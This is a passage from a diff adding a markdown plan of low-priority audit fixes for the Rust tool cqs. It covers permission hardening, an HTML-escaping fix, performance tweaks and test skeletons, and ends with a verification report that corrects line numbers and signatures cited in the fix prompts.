+let unit_exists = matches!(probe, Ok(o) if o.status.success());
+if unit_exists {
+    // existing systemctl --user start path
+} else {
+    // spawn cqs watch --serve directly (mirror macOS branch)
+}
+```
+
+---
+
+## P3-SEC-1 — `cqs ref add` walk parents and chmod
+
+**File:** `src/cli/commands/infra/reference.rs:137-145`
+**Effort:** ~5 min
+**Finding:** SEC-V1.30.1-9
+
+**Fix:** Walk every parent the call may have created and chmod each. Or set process umask to `0o077` for the duration of `create_dir_all`:
+```rust
+#[cfg(unix)]
+{
+    use std::os::unix::fs::PermissionsExt;
+    // ensure ~/.local/share/cqs/refs/ is also 0o700
+    if let Some(refs_root) = ref_dir.parent() {
+        let _ = std::fs::set_permissions(refs_root, std::fs::Permissions::from_mode(0o700));
+    }
+    // existing chmod on ref_dir itself
+}
+```
+Mirror the SEC-D.6 socket pattern at `watch/mod.rs:496` if simpler.
+
+---
+
+## P3-SEC-2 — `cqs ref add` chmod 0o600 on index DB
+
+**File:** `src/cli/commands/infra/reference.rs:165-178`
+**Effort:** ~5 min
+**Finding:** SEC-V1.30.1-10
+
+**Fix:** After `Store::open(...)` succeeds, walk every file in `ref_dir` and chmod to `0o600` (Unix only). Match the pattern in `cqs export-model` for `model.toml`.
+```rust
+#[cfg(unix)]
+{
+    use std::os::unix::fs::PermissionsExt;
+    for entry in std::fs::read_dir(&ref_dir).into_iter().flatten().flatten() {
+        if let Ok(meta) = entry.metadata() {
+            if meta.is_file() {
+                let _ = std::fs::set_permissions(entry.path(), std::fs::Permissions::from_mode(0o600));
             }
         }
     }
 }
 ```
 
-### Replacement
+---
+
+## P3-SEC-3 — `escapeHtml` mirror in callgraph-3d.js
+
+**File:** `src/serve/assets/views/callgraph-3d.js:55`
+**Effort:** ~3 min
+**Finding:** SEC-V1.30.1-3
+
+**Fix:** Mirror the `escapeHtml` helper at the top of the file (matching `cluster-3d.js:21` / `hierarchy-3d.js:19`). Wrap `e.message` at line 55:
+```js
+// at top of file (after IIFE wrapper):
+function escapeHtml(s) {
+    return String(s).replace(/[&<>"']/g, c => ({'&':'&amp;','<':'&lt;','>':'&gt;','"':'&quot;',"'":'&#39;'})[c]);
+}
+
+// at line 55:
+container.innerHTML = `<div class="error" style="margin:24px">3D bundle failed to load: ${escapeHtml(e.message)}</div>`;
+```
+
+---
+
+## P3-SEC-4 — Skip: covered by P2
+
+- **SEC-V1.30.1-4** (tag_user_code_trust_level shape coupling): **Covered by:** P2 entry of same ID.
+
+---
+
+## P3-PF-1 — `enumerate_files` skip-replacement-when-no-backslash
+
+**File:** `src/cli/watch/reconcile.rs:99`
+**Effort:** ~3 min
+**Finding:** PF-V1.30.1-4
+
+**Fix:**
 ```rust
-let mut seen: HashSet<&str> = HashSet::new();
-let mut imports: Vec<String> = Vec::new();
-for chunk in chunks {
-    for line in chunk.content.lines() {
-        let trimmed = line.trim();
-        for &prefix in prefixes {
-            if trimmed.starts_with(prefix) && imports.len() < max
-                && seen.insert(trimmed) {
-                imports.push(trimmed.to_string());
-                break;
-            }
+// before:
+let origin = rel.to_string_lossy().replace('\\', "/");
+
+// after — Linux fast path stays Cow::Borrowed:
+use std::borrow::Cow;
+let origin_lossy = rel.to_string_lossy();
+let origin: Cow<str> = if origin_lossy.contains('\\') {
+    Cow::Owned(origin_lossy.replace('\\', "/"))
+} else {
+    origin_lossy
+};
+```
+Use `origin.as_ref()` against the `HashMap<String, _>`. Cuts unnecessary allocations on Linux/WSL.
+
+---
+
+## P3-PF-2 — `build_stats` collapse 4 round-trips into 1
+
+**File:** `src/serve/data.rs:1105-1128`
+**Effort:** ~5 min
+**Finding:** PF-V1.30.1-5
+
+**Fix:**
+```rust
+let row: (i64, i64, i64, i64) = sqlx::query_as(
+    "SELECT
+        (SELECT COUNT(*) FROM chunks),
+        (SELECT COUNT(DISTINCT origin) FROM chunks),
+        (SELECT COUNT(*) FROM function_calls),
+        (SELECT COUNT(*) FROM type_edges)"
+).fetch_one(&store.pool).await?;
+Ok(StatsResponse {
+    total_chunks: row.0.max(0) as u64,
+    total_files: row.1.max(0) as u64,
+    call_edges: row.2.max(0) as u64,
+    type_edges: row.3.max(0) as u64,
+})
+```
+
+---
+
+## P3-PF-3 — Pre-build cookie needle in AuthMiddlewareState
+
+**File:** `src/serve/auth.rs:357, 292`
+**Effort:** ~10 min
+**Finding:** PF-V1.30.1-6 (also subsumes RM-6, RM-7)
+
+**Fix:** Add `cookie_name: Arc<str>` and `cookie_lookup_needle: Arc<str>` to `AuthMiddlewareState`. Populate at construction time from `cookie_name_for_port(port)` and `format!("{cookie_name}=")`. Update `check_request` to take `&str` for the needle (or borrow from state directly). Both are `Arc<str>` so `Clone` of the state stays cheap. Net: zero allocations per request for auth happy path.
+
+---
+
+## P3-PF-4 — Watch reindex content_hash clone reduction
+
+**File:** `src/cli/watch/reindex.rs:414-417`
+**Effort:** ~5 min
+**Finding:** PF-V1.30.1-7
+
+**Fix (cheap option):** Pre-allocate `Vec::with_capacity(to_embed.len())` to avoid resize cost. Real fix: change downstream HNSW insert API to take `&[&str]` so the clone disappears entirely. Pre-allocate as the immediate win:
+```rust
+let mut content_hashes: Vec<String> = Vec::with_capacity(to_embed.len());
+content_hashes.extend(to_embed.iter().map(|(_, c)| c.content_hash.clone()));
+```
+
+---
+
+## P3-PF-5 — Cache `last_synced_at` to skip `fs::metadata` syscall
+
+**File:** `src/cli/watch/mod.rs:149-185, 1303`
+**Effort:** ~10 min
+**Finding:** PF-V1.30.1-1
+
+**Fix (cheap):** Throttle the metadata call to once per N ticks (e.g., every 10s) since `last_synced_at` is whole-second resolution anyway. Use a `last_metadata_check: Instant` field on `WatchState`.
+
+**Fix (proper):** Add `last_synced_at: Arc<AtomicI64>` to `WatchState`, updated only when the daemon successfully commits a write batch. Publish path reads atomic with no syscall. Strictly better — zero stat() syscalls and exact precision.
+
+---
+
+## P3-RM-1 — Drop `thread_local! REQ_LINE` (premise was wrong)
+
+**File:** `src/cli/watch/socket.rs:91-99`
+**Effort:** ~3 min
+**Finding:** RM-1
+
+**Fix:** Daemon spawns a fresh thread per accept (`daemon.rs:189-205`), not a Tokio blocking pool — so the thread_local doesn't amortize anything. Replace with a plain `let mut line = String::with_capacity(8192);` at the call site. Drop the `thread_local!` block. Same cost, simpler code, comment stops lying.
+
+---
+
+## P3-RM-2 — `read_context_lines` bounded read
+
+**File:** `src/cli/display.rs:59-99, 489`
+**Effort:** ~10 min
+**Finding:** RM-3
+
+**Reframed during verification:** function name corrected — production fn is `read_context_lines` (`display.rs:16-100`); the test-only mirror is `read_context_lines_test` (`display.rs:483-519`). No `compute_context` exists. Both have the `read_to_string(file)` + `content.lines().collect()` pattern at the cited lines (59 and 489 respectively).
+
+**Fix:** Replace `std::fs::read_to_string(file)` + `content.lines().collect()` with a `BufReader` that breaks early. The bound has to be computed up front from the input args (`line_end + context + 1`) since the indexing logic below currently relies on having `lines.len()` for clamping:
+```rust
+use std::io::{BufRead, BufReader};
+let f = std::fs::File::open(file).with_context(...)?;
+// line_start/line_end are already normalised above (max(1)); compute upper bound
+// before clamping so we don't pull lines we'll discard.
+let limit = (line_end as usize)
+    .saturating_add(context)
+    .saturating_add(1);
+let lines: Vec<String> = BufReader::new(f)
+    .lines()
+    .take(limit)
+    .map(|l| l.unwrap_or_default().trim_end_matches('\r').to_string())
+    .collect();
+// rest of indexing logic unchanged
+```
+Apply at both `read_context_lines` (`display.rs:59`) and `read_context_lines_test` (`display.rs:489`).
+
+---
+
+## P3-RM-3 — Skip: P4 / covered
+
+- **RM-2** (wait_for_fresh socket churn): **Covered by:** RB-9 + P4 PF-V1.30.1-2.
+- **RM-4** (HNSW snapshot map): **medium**, P4 territory.
+- **RM-5** (reconcile holds full repo set): **medium**, P4 territory.
+- **RM-6, RM-7**: **Covered by:** P3-PF-3 above.
+
+---
+
+## P3-TC-HAP-1 — Add 4 missing happy-path tests
+
+**Bundles:** TC-HAP-1.30.1-1, TC-HAP-1.30.1-8, TC-HAP-1.30.1-9, TC-HAP-1.30.1-10
+**Effort:** ~30 min total
+
+**Reframed during verification:** signatures fixed against source — `daemon_reconcile(cqs_dir: &Path, hook: Option<&str>, args: &[String])` (not `&str` + `Vec<String>`); `print_text_report(report: &EvalReport)` writes to stdout via `println!` (no `Write` sink), so the -9 test needs a prerequisite refactor; `do_install` doesn't exist (only `cmd_install(no_overwrite, json)` + the lower-level `write_hook_script`), so the -1 test should drive `write_hook_script` directly the way the existing `install_writes_three_hooks_into_fresh_repo` test (`hook.rs:441-456`) does, OR a separate prep prompt should extract `do_install` first. `let mut inp` in -8 is unnecessary — `compute(input(...))` consumes by value.
+
+**TC-HAP-1.30.1-1 — `cmd_install` upgrade-marker** (`src/cli/commands/infra/hook.rs::tests`).
+
+There are two ways to land this; pick one:
+
+(a) **Drive the existing helpers directly** — matches `install_writes_three_hooks_into_fresh_repo` (`hook.rs:441-456`). No new public surface required.
+
+```rust
+#[test]
+fn install_upgrade_replaces_v0_marker_with_current() {
+    let tmp = tempfile::tempdir().unwrap();
+    let hooks = tmp.path().join(".git").join("hooks");
+    std::fs::create_dir_all(&hooks).unwrap();
+    let path = hooks.join("post-checkout");
+    std::fs::write(&path, "#!/bin/sh\n# cqs:hook v0\n").unwrap();
+    // Pre-check: marker is the legacy prefix, not current.
+    let pre = std::fs::read_to_string(&path).unwrap();
+    assert!(pre.contains(HOOK_MARKER_PREFIX));
+    assert!(!pre.contains(HOOK_MARKER_CURRENT));
+    // Drive the lower-level write directly (cmd_install would call
+    // find_project_root, which is bound to the workspace, not the temp tree).
+    write_hook_script(&path, "post-checkout").unwrap();
+    let body = std::fs::read_to_string(&path).unwrap();
+    assert!(body.contains(HOOK_MARKER_CURRENT));
+}
+
+#[test]
+fn install_idempotent_second_run_keeps_marker() {
+    // After two write_hook_script(...) calls, file still contains HOOK_MARKER_CURRENT once.
+}
+
+#[test]
+fn install_no_overwrite_path_skips_when_hook_absent() {
+    // Reproduce the cmd_install None branch with no_overwrite=true: skipped_no_overwrite gets the hook;
+    // assert the file was NOT written.
+}
+```
+
+(b) **Prerequisite refactor first** — split this prompt into:
+   - **TC-HAP-1.30.1-1a (refactor):** extract `fn do_install(git_dir: &Path, no_overwrite: bool) -> Result<InstallReport>` from `cmd_install` (`hook.rs:149`). `cmd_install` becomes a thin wrapper that calls `find_project_root()` + `locate_git_hooks_dir()` + `do_install`.
+   - **TC-HAP-1.30.1-1b (test):** then the original test skeleton works as written:
+     ```rust
+     let report = do_install(&hooks, false).unwrap();
+     assert_eq!(report.upgraded.len(), 1);
+     ```
+
+Pick (a) if minimising scope; (b) if a `do_install` is wanted for other tests too.
+
+**TC-HAP-1.30.1-8 — `WatchSnapshot::compute` Rebuilding state** (`src/watch_status.rs::tests`).
+
+Note: existing `rebuild_dominates_over_stale_files` (`watch_status.rs:278`) covers rebuild + queued files. This adds the zero-pending case:
+
+```rust
+#[test]
+fn compute_with_rebuild_in_flight_zero_pending_returns_rebuilding() {
+    let snap = WatchSnapshot::compute(input(0, true, false, 0));  // helper at :237
+    assert_eq!(snap.state, FreshnessState::Rebuilding);
+    assert!(!snap.is_fresh());
+    assert_eq!(snap.modified_files, 0);
+}
+```
+
+(Drop the `let mut inp = ...` — `compute` consumes the value; binding it adds nothing.)
+
+**TC-HAP-1.30.1-9 — `print_text_report` canonical format** (`src/cli/commands/eval/mod.rs::tests`).
+
+Current signature: `fn print_text_report(report: &EvalReport)` — writes via `println!` to stdout. Two paths:
+
+(a) **Prerequisite refactor:** change to `fn print_text_report<W: std::io::Write>(report: &EvalReport, w: &mut W) -> std::io::Result<()>` (or `&mut dyn Write`). Update the one caller. Then test against a `Vec<u8>` sink:
+```rust
+#[test]
+fn print_text_report_renders_canonical_header_and_metrics() {
+    let report = EvalReport { /* deterministic fixture */ };
+    let mut buf = Vec::new();
+    print_text_report(&report, &mut buf).unwrap();
+    let out = String::from_utf8(buf).unwrap();
+    assert!(out.contains("=== eval results: test (N=2) ==="));
+    assert!(out.contains("R@1=50%"));   // current pct() format — adjust if pct returns "0.5"
+    assert!(out.contains("R@5=100%"));
+}
+```
+
+(b) **No-refactor fallback:** drop this from the bundle and re-file as a `print_text_report` `&mut dyn Write` refactor proposal. Capturing stdout under `cargo test` is brittle (parallel tests, threading); it's not worth the test if the function isn't refactored.
+
+**TC-HAP-1.30.1-10 — `daemon_reconcile` forwards args verbatim** (`src/daemon_translate.rs::tests`).
+
+Real signature (verified `daemon_translate.rs:537-541`):
+```rust
+pub fn daemon_reconcile(
+    cqs_dir: &std::path::Path,
+    hook: Option<&str>,
+    args: &[String],
+) -> Result<DaemonReconcileResponse, String>
+```
+
+```rust
+#[test]
+fn daemon_reconcile_forwards_hook_args_verbatim() {
+    // extend the existing mock to *capture* the request line as a String
+    let captured = daemon_reconcile(
+        cqs_dir,
+        Some("post-checkout"),
+        &["abc123".into(), "def456".into(), "1".into()],
+    );
+    // assert captured JSON: parsed_request["args"] == ["abc123","def456","1"]
+}
+
+#[test]
+fn daemon_reconcile_forwards_unicode_args() {
+    let _ = daemon_reconcile(
+        cqs_dir,
+        Some("post-merge"),
+        &["mañana".into(), "🚀".into()],
+    );
+    // assert captured payload preserves UTF-8
+}
+```
+
+---
+
+## P3-TC-HAP-2 — Skip: P2 / hard / subsumed
+
+- **TC-HAP-1.30.1-2,3,4,7** are P2 entries (hook commands, status, gate end-to-end). Skipped here.
+- **TC-HAP-1.30.1-5** (Stale → Fresh transition): **medium** effort, falls into the P2 batch refactor of `wait_for_fresh` (cross-cutting bundle).
+- **TC-HAP-1.30.1-6** (process_file_changes direct tests): **hard**, P4 territory.
+
+---
+
+# Summary
+
+**Distinct prompts after grouping: 51 actionable + 9 explicit skip markers = 60 entries total**
+
+78 raw P3 findings collapsed into 51 distinct actionable fix prompts. The 9 skip markers document why specific P3 IDs are covered by higher-priority fixes (P1/P2) or subsumed by another P3 bundle.
+
+**Top 5 patterns bundled:**
+
+1. **Per-file env-knob promotion** (P3-SHL-1 through P3-SHL-9, 9 sites) — replace hardcoded constants with `crate::limits::*` resolvers reading `CQS_*` env vars. Single canonical pattern, applied to wait poll interval, eval cap, task gather, onboard caps, MAX_REFERENCES, MAX_NOTES file/entries, ENRICHMENT_PAGE_SIZE, prune threshold, gc_cap caching.
+
+2. **Documentation drift** (P3-DOC-1, 5 sites in one prompt) — README command list, CONTRIBUTING architecture overview, PRIVACY/SECURITY platform paths, README watch-mode default, CHANGELOG/ROADMAP cache subcommand list. All small text tweaks with no trust-claim shifts.
+
+3. **`unwrap_or_default()`/`let _ =` swallow-error** (P3-EH-1, 4 sites in one prompt) — replace with explicit `match` + `tracing::warn!` per the post-v0.12.1 audit rule. Covers slot resolution, doctor list_slots, index --json envelope, reranker checksum write.
+
+4. **Saturating/defensive timestamp casts** (P3-RB-2, P3-RB-3, P3-RB-6 — 3 prompts; ~7 cast sites total) — hoist `unix_secs_i64()` helper, swap `as i64` for `try_from(...).ok()`, use saturating cast on WatchSnapshot counters.
+
+5. **Tracing observability papercuts** (P3-OB-1 through P3-OB-5, 5 prompts) — demote per-search info spam to debug; add closing events to wait_for_fresh; add reason-enum to 401 warns; add entry span + outcome event to require_fresh_gate; add elapsed_ms to reconcile/GC walks.
+
+---
+
+## P3 Verification Report
+
+Verification pass run 2026-04-28 against source at HEAD (c19a2eef post-v1.30.1 + #1197 / #1198). Each prompt's "before" / cited line is checked; tableized prompts are spot-checked across all rows.
+
+### P3-DOC-1: NEEDS FIX
+**Issue (item 1 README:540-569):** the `cqs hook` and `cqs status --watch-fresh` rows are NOT yet in the canonical command list at README:540-569 — verified by grep; absent. Prompt's instruction to add them is correct, anchor is right.
+**Issue (item 3 PRIVACY anchors):** Prompt cites "PRIVACY.md:21-22" as the `~/.cache/cqs/` line. Actual PRIVACY.md:20 is `~/.cache/cqs/embeddings.db`, :21 is `query_cache.db`, :22 is `query_log.jsonl` — three lines, not one. The fix needs to extend the legacy block at 18-22 with platform paths, not replace a single line.
+**Issue (item 4 README:219-220):** existing line 219 already says "(250 ms poll, capped at 600 s)". Replacement adds default-30s; current text is acceptable but the "default 30 s budget" is more discoverable. Minor.
+**Issue (item 5 ROADMAP/CHANGELOG):** verified both ROADMAP.md:131 and CHANGELOG.md:71 have `{stats,prune,compact}` (missing `clear`). Replacement to `{stats,clear,prune,compact}` is correct.
+**Correction:** Item 1 anchors verified — insert two new rows after README:568. Item 3: cite anchors as PRIVACY.md:18-22 (legacy block) and SECURITY.md:111-115 (read-access table). Item 4 verbatim acceptable. Item 5 verbatim correct.
+
+### P3-DOC-2: VERIFIED
+Skip marker for DOC-V1.30.1-8 — folded into DOC-1 item 2.
+
+### P3-CQ-1: VERIFIED
+Lines 248-255 match exactly. `snap.modified_files`, `snap.dropped_this_cycle`, `snap.delta_saturated` all real fields on `WatchSnapshot`.
+
+### P3-CQ-2: VERIFIED
+`embedder/provider.rs:14`, `reranker.rs:100`, `splade/mod.rs:27` all hold the duplicate `ort_err`. The cross-module rationale comment at `reranker.rs:99` is verified.
+
+### P3-CQ-3: VERIFIED
+`cli/commands/serve.rs:27-37` matches; `serve/mod.rs:162-165` has the unconditional `WARN: --no-auth` warning.
+
+### P3-API-1: NEEDS FIX
+**Issue (API-V1.30.1-7):** Prompt cites `cli/watch/mod.rs:1303` as the WatchSnapshotInput caller; the real call site is at `cli/watch/mod.rs:165`. Line 1303 is the `publish_watch_snapshot(...)` invocation, not the struct construction.
+**Correction:** Change "Migrate the one caller in `cli/watch/mod.rs:1303`" → "Migrate the one caller in `cli/watch/mod.rs:165`".
+**All other rows verified:** API-V1.30.1-2 (definitions.rs:792 + eval/mod.rs:85), -3 (eval/mod.rs:79-80), -4 (daemon_translate.rs:236, watch_status.rs:105), -6 (daemon_translate.rs:517-519), -8 (status.rs:41-54), -9 (watch_status.rs:51-60), -10 (watch_status.rs:101 + 219).
+
+### P3-API-2: VERIFIED
+Skip marker for API-V1.30.1-5 (folded into bundle-wait-fresh).
+
+### P3-EH-1: VERIFIED
+All four sites verified at the cited lines: `dispatch.rs:207`, `doctor.rs:923`, `build.rs:863-867`, `reranker.rs:524`.
+
+### P3-OB-1: VERIFIED
+`router.rs:469-474, 491-496, 549-554, 1146-1150` all hold `tracing::info!` with the cited shapes.
+
+### P3-OB-2: VERIFIED
+`daemon_translate.rs:660-679` is the function body. Three terminal returns at lines 669, 672, 676 — all need the closing event per the prompt.
+
+### P3-OB-3: VERIFIED
+`auth.rs:389-401` is the warn site; `auth.rs:269-321` is `check_request`. Both line ranges correct. `AuthOutcome::Unauthorized` is bare today (no reason carried).
+
+### P3-OB-4: VERIFIED
+`eval/mod.rs:219-275` is the `require_fresh_gate` body. Three terminal paths (Fresh Ok, Timeout bail, NoDaemon bail) all need the outcome event.
+
+### P3-OB-5: VERIFIED
+`reconcile.rs:63-148` is `run_daemon_reconcile`; `gc.rs:103-180` is `run_daemon_startup_gc`; `gc.rs:195-243` is `run_daemon_periodic_gc`. All have terminal `tracing::info!` per the prompt.
+
+### P3-OB-6: VERIFIED
+Skip markers — OB-V1.30.1-8/-9/-10 covered by P2 entries.
+
+### P3-TC-ADV-1: NEEDS FIX
+**Issue (unwrap_dispatch_payload test):** Prompt's test calls `unwrap_dispatch_payload(v, "TestType")` but the function signature is `fn unwrap_dispatch_payload(output: &serde_json::Value, type_name: &str) -> Result<serde_json::Value, String>`. The first arg must be a reference: `&v`.
+**Correction:** `let result = unwrap_dispatch_payload(&v, "TestType");` (& added).
+**Other tests verified:** `try_from_string_accepts_long_alphabet_input_today` (AuthToken::try_from_string takes `impl Into<String>`); cookie/bearer pin tests pin current behavior accurately per `auth.rs:269-321`.
+
+### P3-TC-ADV-2: VERIFIED
+`eval/mod.rs:282-290` is `env_disables_freshness_gate`; `:405-432` is the test inline-rewriting the body. The rewrite pattern using `serial_test::serial(...)` matches existing convention in `daemon_translate.rs::tests`.
+
+### P3-TC-ADV-3: VERIFIED
+Skip marker for TC-ADV-1.30.1-8 — covered by CQ-V1.30.1-2 P1 fix.
+
+### P3-RB-1: VERIFIED
+`daemon_translate.rs:660-662` matches the function signature + deadline calc. The defensive `.min(86_400)` cap is sound.
+
+### P3-RB-2: VERIFIED
+All 5 sites verified: `watch_status.rs:226-231` (now_unix_secs), `cli/batch/mod.rs:779`, `cli/batch/mod.rs:1988`, `cli/commands/infra/ping.rs:122`, `cli/watch/mod.rs:159`. The 5th-site caveat about `m.modified()` vs `now()` is correct.
+
+### P3-RB-3: VERIFIED
+`cli/watch/reindex.rs:507-508` has `.map(|d| d.as_millis() as i64)`.
+
+### P3-RB-4: VERIFIED
+`slot/mod.rs:656` has `let detail = fs::read_to_string(&sentinel).unwrap_or_default();`.
+
+### P3-RB-5: VERIFIED
+`lib.rs:680-685` matches the `if path.starts_with(&root) { ... } else { ... }` pattern.
+
+### P3-RB-6: VERIFIED
+`watch_status.rs:213-218` matches the cited cast block.
+
+### P3-RB-7: VERIFIED
+`eval/mod.rs:296-309` is `print_text_report` body; the empty-fixture short-circuit before `pct(...)` is correct.
+
+### P3-SHL-1: VERIFIED
+`daemon_translate.rs:663` has the `poll_interval = Duration::from_millis(250)`.
+
+### P3-SHL-2: VERIFIED
+`eval/mod.rs:237` has `let budget_secs = wait_secs.min(600);`.
+
+### P3-SHL-3: VERIFIED
+`task.rs:19-25` (constants) and `task.rs:143-149` (`.with_max_expanded_nodes(...)` chain) both verified.
+
+### P3-SHL-4: VERIFIED
+`onboard.rs:30-33` (constants) and `:174-175` (caps) both verified.
+
+### P3-SHL-5: VERIFIED
+`config.rs:390-405` has `const MAX_REFERENCES: usize = 20;` and the validate truncate block.
+
+### P3-SHL-6: VERIFIED
+`note.rs:20` has `MAX_NOTES = 10_000`; lines 169 and 245 each have the duplicated `MAX_NOTES_FILE_SIZE`; `note.rs:331` has the silent `.take(MAX_NOTES)`.
+
+### P3-SHL-7: VERIFIED
+`enrichment.rs:46` has `const ENRICHMENT_PAGE_SIZE: usize = 500;`; `:127` has `chunks_paged(cursor, ENRICHMENT_PAGE_SIZE)`.
+
+### P3-SHL-8: VERIFIED
+`gc.rs:42` has `LAST_INDEXED_PRUNE_SIZE_THRESHOLD: usize = 5_000;`.
+
+### P3-SHL-9: VERIFIED
+`gc.rs:78-86` matches the `OnceLock` cache pattern.
+
+### P3-AC-1: VERIFIED
+`router.rs:813-816` is inside `is_structural_query`; the callers at 643 (lowercased), 900, 1265, 1275-1276 (raw) are correctly identified.
+
+### P3-AC-2: NEEDS FIX
+**Issue:** Prompt says "stuck status RPC doesn't push the helper over budget by up to one daemon-timeout's worth (~30s)". Actual `daemon_status` timeout is 5s (`daemon_translate.rs:444`), not 30s. The fix is still valid but the impact framing is inflated.
+**Correction:** Update prompt to say "by up to ~5s (one daemon_status read+write timeout)" instead of ~30s. Mechanical fix unchanged.
+
+### P3-AC-3: VERIFIED
+`search/scoring/candidate.rs:231` has the `score > *worst_score || (score == *worst_score && id < *worst_id)` predicate.
+
+### P3-AC-4: VERIFIED
+`watch_status.rs:219` has `idle_secs: input.last_event.elapsed().as_secs()`. Adding `idle_ms` field is non-invasive.
+
+### P3-AC-5: VERIFIED
+Skip markers — AC-V1.30.1-3, -9, -10 covered by P2 entries.
+
+### P3-EX-1: VERIFIED
+All 6 `log_query` sites confirmed at `commands.rs:508, 531, 567, 577, 581, 603`. Macro `for_each_batch_cmd_pipeability!` at `:372-447` exists and is the right extension target.
+
+### P3-EX-2: VERIFIED
+`eval/mod.rs:282-289` matches the `env_disables_freshness_gate` body.
+
+### P3-PB-1: NEEDS FIX
+**Issue:** Premise is partially mistaken. Current code `bind != "127.0.0.1" && bind != "localhost" && bind != "::1"` DOES warn for `0.0.0.0` and `::` because they don't match any of the three exclusions. So the prompt's claim that the warning "misses wildcard binds" is wrong — it actually warns for them today. The `is_loopback()` refactor is still cleaner (catches `127.0.0.2` etc. as loopback, currently false-positive-warned), but the framing should be flipped.
+**Correction:** Reword prompt: "Replace string-equality with `IpAddr::is_loopback()` so any 127.0.0.0/8 bind correctly suppresses the warning. Current code over-warns on `127.0.0.2` and similar — does NOT under-warn on `0.0.0.0`."
+
+### P3-PB-2: VERIFIED
+`serve.rs:39-41` matches.
+
+### P3-PB-3: VERIFIED
+Skip markers for PB-V1.30.1-3, -7, -9.
+
+### P3-PB-4: VERIFIED
+`fs.rs:90-108` has the parent-fsync block (open + sync_all). Wrapping in `#[cfg(unix)]` is correct.
+
+### P3-PB-5: VERIFIED
+`hook.rs:99-105` has `InstallReport { git_dir: PathBuf, ... }`; `:152` is `let git_dir = locate_git_hooks_dir(&root)?;`; `:354` is `let path = git_dir.join(hook);`.
+
+### P3-PB-6: VERIFIED
+`model.rs:710-738` has the systemctl restart block; `:745+` has the macOS `current_exe()` direct-spawn fallback.
+
+### P3-SEC-1: VERIFIED
+`reference.rs:137-145` has create_dir_all + chmod block.
+
+### P3-SEC-2: VERIFIED
+`reference.rs:165-178` is the Store::open + run_index_pipeline path. The fix to walk read_dir + chmod after is correct.
+
+### P3-SEC-3: VERIFIED
+`callgraph-3d.js:55` has the unescaped `${e.message}`. `cluster-3d.js:21` and `hierarchy-3d.js:19` both have the `escapeHtml` helper to mirror.
+
+### P3-SEC-4: VERIFIED
+Skip marker for SEC-V1.30.1-4.
+
+### P3-PF-1: VERIFIED
+`cli/watch/reconcile.rs:99` has `let origin = rel.to_string_lossy().replace('\\', "/");`.
+
+### P3-PF-2: VERIFIED
+`serve/data.rs:1105-1128` has the 4-query `build_stats` body matching the "before".
+
+### P3-PF-3: VERIFIED
+`serve/auth.rs:357` has the per-request `cookie_name_for_port(state.cookie_port)` allocation; `:292` has `let needle = format!("{cookie_name}=");`. The pre-build target `AuthMiddlewareState` at `:339-342` has `token: AuthToken, cookie_port: u16` fields.
+
+### P3-PF-4: VERIFIED
+`reindex.rs:414-417` is the `Vec::collect()` of cloned content_hashes.
+
+### P3-PF-5: VERIFIED
+`cli/watch/mod.rs:149-185` is `publish_watch_snapshot`; `:1303` is its only caller. The metadata fast-path optimization is mechanically sound.
+
+### P3-RM-1: VERIFIED
+`socket.rs:91-99` has `thread_local! { static REQ_LINE: RefCell<String> ... }`. `daemon.rs:189-205` confirms a fresh thread per accept (`std::thread::Builder::new().spawn(...)`), so the thread_local doesn't amortize across connections.
+
+### P3-RM-2: NEEDS FIX
+**Issue:** Prompt says fix targets `compute_context` at `display.rs:59` and `:489`. **No `compute_context` function exists in display.rs.** The actual functions are `read_context_lines` (`display.rs:16-100`) and `read_context_lines_test` (`display.rs:483+`, inside `#[cfg(test)] mod tests`). Both have the `read_to_string` + `lines().collect()` pattern at the cited line numbers (59, 489).
+**Correction:** Rename target in prompt: "Replace the `read_to_string(file)` + `content.lines().collect()` pattern in `read_context_lines` (`display.rs:59`) and `read_context_lines_test` (`display.rs:489`)."
+
+### P3-RM-3: VERIFIED
+Skip markers for RM-2, RM-4, RM-5, RM-6, RM-7.
+
+### P3-TC-HAP-1: NEEDS FIX
+**Issue (TC-HAP-1.30.1-1):** Test skeleton uses `do_install(&hooks, false)` — **`do_install` does not exist in `hook.rs`**. Only `cmd_install(no_overwrite, json)` exists, which calls `find_project_root()` + `locate_git_hooks_dir()`. The prompt acknowledges in passing ("factor out a do_install...") but the test as-written won't compile.
+**Issue (TC-HAP-1.30.1-10):** Test skeleton calls `daemon_reconcile(cqs_dir, "post-checkout", vec!["abc123".into(), ...])`. Real signature is `pub fn daemon_reconcile(cqs_dir: &std::path::Path, hook: Option<&str>, args: &[String]) -> Result<DaemonReconcileResponse, String>`. The hook arg must be `Some("post-checkout")` and args must be `&["abc123".into(), ...]` (slice ref, not Vec).
+**Issue (TC-HAP-1.30.1-8):** Skeleton's `let mut inp = input(0, true, false, 0)` — the `mut` is unnecessary (compute moves the value). Also note the existing test `rebuild_dominates_over_stale_files` at `watch_status.rs:278-284` already covers `Rebuilding` state with files queued; this test is incremental (rebuild + zero pending).
+**Issue (TC-HAP-1.30.1-9):** Test for `print_text_report` — function signature is `fn print_text_report(report: &EvalReport)` (prints to stdout via `println!`, not a `Write`-trait sink). Skeleton needs `print_text_report` refactored first to take `&mut dyn Write`.
+**Correction:** TC-HAP-1.30.1-1: prerequisite step — refactor `cmd_install` to extract `do_install(git_dir: &Path, no_overwrite: bool) -> Result<InstallReport>` first; existing tests already follow the "drive the lower-level write directly" pattern (`hook.rs:441-456`, `install_writes_three_hooks_into_fresh_repo`). TC-HAP-1.30.1-10: fix sig — `daemon_reconcile(cqs_dir, Some("post-checkout"), &["abc123".into(), "def456".into(), "1".into()])`. TC-HAP-1.30.1-9: requires refactoring `print_text_report(report: &EvalReport, w: &mut dyn Write)` first.
+
+### P3-TC-HAP-2: VERIFIED
+Skip markers for TC-HAP-1.30.1-2, -3, -4, -5, -6, -7.
+
+---
+
+### P3 Verification Summary
+
+- **VERIFIED:** 41
+- **NEEDS FIX:** 8 (DOC-1, API-1, TC-ADV-1, AC-2, PB-1, RM-2, TC-HAP-1, plus minor anchor inaccuracies in DOC-1)
+- **ALREADY FIXED:** 0
+
+### Top Systematic Defects Across NEEDS FIX
+
+1. **Wrong function names / line numbers from drift** — P3-RM-2 cites `compute_context` (doesn't exist; function is `read_context_lines`); P3-API-1 cites `cli/watch/mod.rs:1303` for WatchSnapshotInput caller (real line 165, line 1303 is `publish_watch_snapshot` invocation). Both stem from the prompt author searching by function role rather than reading source.
+2. **Fictional helpers required by test skeletons** — P3-TC-HAP-1's `do_install` doesn't exist; the prompt assumes a refactor that hasn't happened. P3-TC-HAP-1's `print_text_report` test assumes a Write-trait refactor. These prompts mix prerequisite refactor with the test it enables.
